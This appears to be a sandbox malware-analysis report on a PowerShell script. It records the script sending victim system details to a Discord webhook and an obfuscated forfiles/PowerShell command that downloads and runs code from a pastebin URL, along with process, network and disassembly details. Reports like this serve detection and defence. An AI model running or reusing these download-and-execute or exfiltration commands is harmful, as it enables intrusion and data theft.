                                                                            2024-10-15 16:09:37 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.949983162.159.137.2324431172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-15 16:09:42 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Content-Type: application/json
                                                                            Host: discord.com
                                                                            Content-Length: 297
                                                                            Connection: Keep-Alive
                                                                            2024-10-15 16:09:42 UTC297OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 42 42 44 39 50 52 4d 54 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** BBD9PRMT\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                                                            2024-10-15 16:09:43 UTC1261INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 15 Oct 2024 16:09:43 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 45
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                            x-ratelimit-limit: 5
                                                                            x-ratelimit-remaining: 4
                                                                            x-ratelimit-reset: 1729008584
                                                                            x-ratelimit-reset-after: 1
                                                                            via: 1.1 google
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yks24Qeo%2FvBVTLCpbdYi4G3bgPxTNaAKqq0%2FJ4ASqsj9YqtloAPKaTkF79Nq%2FkQ41z9wcmxq3Jfk%2FCi3bJ1bPHSF7mAll7IbaBiUIVy8YfYGgoR%2F2dWMt9oc8%2BGP"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            X-Content-Type-Options: nosniff
                                                                            Set-Cookie: __cfruid=4d52b112f98ae2b2397b9d020ae0cb949a5a48fd-1729008583; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                            Set-Cookie: _cfuvid=PcsxqrxpptZzN02y_GtOmwOFT__Cp0NcNIOVR0y4N30-1729008583016-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d31133b4cea28d1-DFW
                                                                            2024-10-15 16:09:43 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.949984162.159.137.2324431796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-15 16:09:51 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Content-Type: application/json
                                                                            Host: discord.com
                                                                            Content-Length: 297
                                                                            Connection: Keep-Alive
                                                                            2024-10-15 16:09:51 UTC297OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 42 42 44 39 50 52 4d 54 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** BBD9PRMT\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                                                            2024-10-15 16:09:51 UTC1251INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 15 Oct 2024 16:09:51 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 45
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                            x-ratelimit-limit: 5
                                                                            x-ratelimit-remaining: 4
                                                                            x-ratelimit-reset: 1729008592
                                                                            x-ratelimit-reset-after: 1
                                                                            via: 1.1 google
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TDvtvwecEXbhzrdCAcXbH9BbCNfmjQM5E4VmY2jx3acihMaT5yUBx2r9F78KZ8HeuwtKyfRjZv81%2BU4tJMDKSeW6jiTNnPozxPH15C9pP2vn4afw9Nhf7Qw7fhlI"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            X-Content-Type-Options: nosniff
                                                                            Set-Cookie: __cfruid=405b83809d3638731d6709738a2f99d9ef520ffb-1729008591; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                            Set-Cookie: _cfuvid=L6KffKQGrwN_zOxVH.tSRjO4bmSPr08MscyZpWQByCw-1729008591608-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d3113707ee62cd4-DFW
                                                                            2024-10-15 16:09:51 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:12:08:46
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1"
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:12:08:46
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70f010000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:12:08:49
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline"
                                                                            Imagebase:0x7ff789470000
                                                                            File size:2'759'232 bytes
                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:12:08:49
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\r422pnl3\CSC544D18D68EB4FCE8319BF18EEFBBF9E.TMP"
                                                                            Imagebase:0x7ff6f6080000
                                                                            File size:52'744 bytes
                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:12:09:24
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\forfiles.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                            Imagebase:0x7ff7eeb60000
                                                                            File size:52'224 bytes
                                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:12:09:24
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70f010000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:12:09:25
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:10
                                                                            Start time:12:09:25
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\attrib.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                            Imagebase:0x7ff790220000
                                                                            File size:23'040 bytes
                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:11
                                                                            Start time:12:09:25
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:12
                                                                            Start time:12:09:32
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\forfiles.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                            Imagebase:0x7ff7eeb60000
                                                                            File size:52'224 bytes
                                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:13
                                                                            Start time:12:09:32
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70f010000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:14
                                                                            Start time:12:09:33
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:15
                                                                            Start time:12:09:33
                                                                            Start date:15/10/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 00007FF887ADE7E6 Relevance: .5, Instructions: 472COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 59559c3272a87be53e97012ac835886bc84cb680e554e8c91e5a44335d632f9d
                                                                              • Instruction ID: efb2c529354d6ec4d5f035c1dee6ac9881999eb4bba349b37f230044ee5577c2
                                                                              • Opcode Fuzzy Hash: 59559c3272a87be53e97012ac835886bc84cb680e554e8c91e5a44335d632f9d
                                                                              • Instruction Fuzzy Hash: 78F1633090CA4D8FEBA8DF28C8567F97BE1FB54350F04427AE84DC7296DB3499458B82
                                                                              Function 00007FF887ADF592 Relevance: .5, Instructions: 458COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 951f584dc97494932fc110c35d301227e60f519b731a0d7894c87aa4d0e868a1
                                                                              • Instruction ID: 9b57f37fd86edad0c9e93e1cca9ccbe17208b8602f32e53b632e275952830f3c
                                                                              • Opcode Fuzzy Hash: 951f584dc97494932fc110c35d301227e60f519b731a0d7894c87aa4d0e868a1
                                                                              • Instruction Fuzzy Hash: DAE1A430908A8D8FEB68DF28C8567E97BE1FF54351F04427AD85DC7295CE789941CB82
                                                                              Function 00007FF887BA73B0 Relevance: 6.7, Strings: 5, Instructions: 433COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1789091323.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6f$6f$r6f$r6f$r6f
                                                                              • API String ID: 0-2410354046
                                                                              • Opcode ID: 7fa1f902fa26f6ad210ba55ed17650e4ff91f93b7546216a2dc744905ebde3e0
                                                                              • Instruction ID: ade505f0da9caf741df58dbfa851cad6708e3d6059f716d2e44534dda5c10014
                                                                              • Opcode Fuzzy Hash: 7fa1f902fa26f6ad210ba55ed17650e4ff91f93b7546216a2dc744905ebde3e0
                                                                              • Instruction Fuzzy Hash: E9D1D131E0DA4A4FEB94EA2C94556BCB7E2FF58394F5801BED00DC7292DE29AC45C781
                                                                              Function 00007FF887BA73BB Relevance: 5.3, Strings: 4, Instructions: 330COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1789091323.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6f$6f$r6f$r6f
                                                                              • API String ID: 0-1109248338
                                                                              • Opcode ID: ff179d98e1e9693e597ef028e083bc541044be0e88157b0a29881a701b6b1dca
                                                                              • Instruction ID: 02a581987c45b7d315cb3781ce1508a834fa39ce4122e158ce7b6b9c9b33b973
                                                                              • Opcode Fuzzy Hash: ff179d98e1e9693e597ef028e083bc541044be0e88157b0a29881a701b6b1dca
                                                                              • Instruction Fuzzy Hash: DCB1ED31E0EA8A4FEB95EB2C895467CBBF2FF55394B5C01BAC00DC7192DA29AC45C741
                                                                              Function 00007FF887AE1DCE Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6f$0Wp
                                                                              • API String ID: 0-3224254019
                                                                              • Opcode ID: 37eb9a0333b35da6ca6bba1d6323e116ceeea79de738687c054cb803d4c2eb92
                                                                              • Instruction ID: a6ebba631fd9912dec0ea50c61968344ace7d3bdd88d39811f3f96f0c46e08fc
                                                                              • Opcode Fuzzy Hash: 37eb9a0333b35da6ca6bba1d6323e116ceeea79de738687c054cb803d4c2eb92
                                                                              • Instruction Fuzzy Hash: B351C532A5CA598FE798DB6898566BD77E1FF98780F040179D44EC7292CE28AC01C781
                                                                              Function 00007FF887BA41A9 Relevance: .5, Instructions: 477COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1789091323.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: deac22ce0c6ff64a69e080685c2472aa6815685dbc72dd6dc5c528369745f8d8
                                                                              • Instruction ID: c21bf4c995771ee9859772d947d68f947ddc377f2d0cb622ed15c24800c5088d
                                                                              • Opcode Fuzzy Hash: deac22ce0c6ff64a69e080685c2472aa6815685dbc72dd6dc5c528369745f8d8
                                                                              • Instruction Fuzzy Hash: EBE12431E4DA894FE795EB2C88446B9BBF2FF553A0B1801BED44DC7192DE29AC06C741
                                                                              Function 00007FF887ADF1A6 Relevance: .3, Instructions: 333COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bbcc2d36aede570b44f3195d7476a3d2c0ba14930c4c0efe107bf9faf18568f2
                                                                              • Instruction ID: b424f3c8f6caa45adb0390956e262f749d4805c9f53b2cbd9f67485d8d035289
                                                                              • Opcode Fuzzy Hash: bbcc2d36aede570b44f3195d7476a3d2c0ba14930c4c0efe107bf9faf18568f2
                                                                              • Instruction Fuzzy Hash: 00B1D43090CA8D4FEB68DF28D8567E93BE1FF55350F04427AE85DC7292CA789945CB82
                                                                              Function 00007FF887AE2969 Relevance: .1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4b7f67526a6ba69f349ffe879be85d2b5e86a24741b126fe9dbba735603f8e99
                                                                              • Instruction ID: 9a0539944dbcbcf2dd9d8f4d99c2661b8603d40e9207cd57c71d68a5a18a9d02
                                                                              • Opcode Fuzzy Hash: 4b7f67526a6ba69f349ffe879be85d2b5e86a24741b126fe9dbba735603f8e99
                                                                              • Instruction Fuzzy Hash: 6131D122E5CD9A5FE795A7BC541A7BC6AE0EF45390F0801BAE04CCB1E3DD1CA8858342
                                                                              Function 00007FF887ADECA4 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4e69fda927e3c66f5700ecbb24a438945959fbd5bd480cfcfd99b45a5d237db8
                                                                              • Instruction ID: b7fd9bdb914a3179cc5544eaa80355fb0799d43ec67c49c1eea3539769729c80
                                                                              • Opcode Fuzzy Hash: 4e69fda927e3c66f5700ecbb24a438945959fbd5bd480cfcfd99b45a5d237db8
                                                                              • Instruction Fuzzy Hash: 6E311A3085968E8EFBB4AF14CC6ABFD36A1FF45359F400139D44E861E3DE386985CA51
                                                                              Function 00007FF887AE28FA Relevance: .1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ce39d605170d2f19630d34051d34d0c6ad56f7939eb24a1677aa838485979a1c
                                                                              • Instruction ID: 66d5fa0390523181d3da2cefa70a3aee09904a2d1010979da5168e1b3e823945
                                                                              • Opcode Fuzzy Hash: ce39d605170d2f19630d34051d34d0c6ad56f7939eb24a1677aa838485979a1c
                                                                              • Instruction Fuzzy Hash: 7F11CE22E6C9598FE644B7AC64166EC27A0EF88791B1841B7D04DCB1D7CD1898428391
                                                                              Function 00007FF887AD4835 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
